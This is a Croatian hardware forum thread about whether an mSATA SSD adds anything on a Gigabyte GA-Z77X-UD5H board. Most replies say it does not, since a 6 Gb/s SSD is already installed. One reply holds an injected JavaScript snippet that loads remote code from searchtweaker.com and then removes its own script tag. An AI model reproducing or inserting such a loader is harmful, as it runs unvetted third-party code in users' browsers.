Matična ploča GIGABYTE GA-Z77X-UD5H

poruka: 9
|
čitano: 2.018
|
moderatori: DrNasty, pirat, XXX-Man, vincimus
1
+/- sve poruke
ravni prikaz
starije poruke gore
12 godina
neaktivan
Nadam se a ce ovaj upit imat smisla i zasto sam odlucio zagadit forum ovom temom.
Dakle,uzeo sam kompjuter kojem je sastavni dio konfiguracije ploca u naslovu.
I proucavajuci malo taj svoj hardver koji sam dobro platio otkrio sam da se na tu plocu novijeg datuma kako sam to otkrio moze
ubacit dodatni SSD
Intel 310 SSDMAEMC080G2C1 80GB (MLC)
E sad moje pitanje glasi, sto se dobije ovom ugradnjom i dali je to uopce toliko potrebno.
Fala na odgovoru.
GTX 690 SLI
Moj PC  
0 0 hvala 0
13 godina
Re: Matična ploča GIGABYTE GA-Z77X-UD5H
GTX 690 Sli kaže...
Nadam se a ce ovaj upit imat smisla i zasto sam odlucio zagadit forum ovom temom.
Dakle,uzeo sam kompjuter kojem je sastavni dio konfiguracije ploca u naslovu.
I proucavajuci malo taj svoj hardver koji sam dobro platio otkrio sam da se na tu plocu novijeg datuma kako sam to otkrio moze
ubacit dodatni SSD
Intel 310 SSDMAEMC080G2C1 80GB (MLC)
E sad moje pitanje glasi, sto se dobije ovom ugradnjom i dali je to uopce toliko potrebno.
Fala na odgovoru.

On ti može poslužiti za boot disk, ali pošto već imaš SSD, to ti ne treba...

Živim luksuzno! Jedem luk i lijem suze... :)
12 godina
neaktivan

Znaci on sluzi u stvari za instalaciju windovsa,ja sam to zamisljao malo drukcije.

Mislio sam da bi ga sistem koristio za neke svoje instalacije tako da sistem brze i sigurnije radi.

GTX 690 SLI
14 godina
protjeran

Moguće ga je i za to koristit

AŠrot Superman, Gigabyte Kryptonite, If you want ŠROT buy ASRock, if you want quality buy Asus
Moj PC  
0 0 hvala 0
12 godina
neaktivan

Evo disk narucen pa cemo vidit poslje instalacije sto i kako ce se odrazit na cijeli sistem.

GTX 690 SLI
Moj PC  
0 0 hvala 0
14 godina

Kupi si 3930K, adekvatnu plocu i NHD14, stavljeno u temi za konfe.

iclock2much

1 0 hvala 0
15 godina
neaktivan
GTX 690 Sli kaže...

Evo disk narucen pa cemo vidit poslje instalacije sto i kako ce se odrazit na cijeli sistem.

kolko sam pročitao po raznim forumima,o msata diskovima,rijetko ko koristi za sistemski disk,koristi se za instalaciju raznih programa tipa kodiranje videa i te šeme i tu je brzina najočitija...

Što ga više lome-to ga više volim!
17 godina
GTX 690 Sli kaže...

Znaci on sluzi u stvari za instalaciju windovsa,ja sam to zamisljao malo drukcije.

Mislio sam da bi ga sistem koristio za neke svoje instalacije tako da sistem brze i sigurnije radi.

Ako imaš SSD disk na 6 Gb/s kako misliš da će ti ovaj raditi brže i sigurnije kad mSATA port radi  na 3Gb/s?  Ovo ima smisla ako imaš klasičan HDD pa da malo ubrzaš sistem onda koristiš taj mSATA.

Ovako, bačen novac a ništa nećeš dobiti... no ako te to veseli bez obzira na sve onda ima smisla. Inače danas kupio tu ploču pa me interesira kako si zadovoljan njome? Prvi put da imam gigabyte matičnu.

Malo sam skeptičan ali eto, probam pa ću vidjeti...

(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
12 godina
neaktivan

Pozdrav Pravo da ti kazem neznam ni sam,usao sam u ducan uzeo kompic i posli 7 dana otisa tako da cu vise znat posli nove godine.

Alo za tih par dana digli sistem i sve bilo ok,svida mi se onaj njihov 3D bios i jedino sam imao crveni ekran tu i tamo ali citao sam po netu da je to od Drivera sa graficke pa to moram rijesit kad dodem doma.

Momentalno sam u pronalazenju WC vodenog hladenja za kompic tako da sam sad oko toga jer planiram to mao hladit kako treba , ali o tome vise drugom prilikom.

GTX 690 SLI
Moj PC  
0 0 hvala 0
1
Nova poruka
E-mail:
Lozinka:

vrh stranice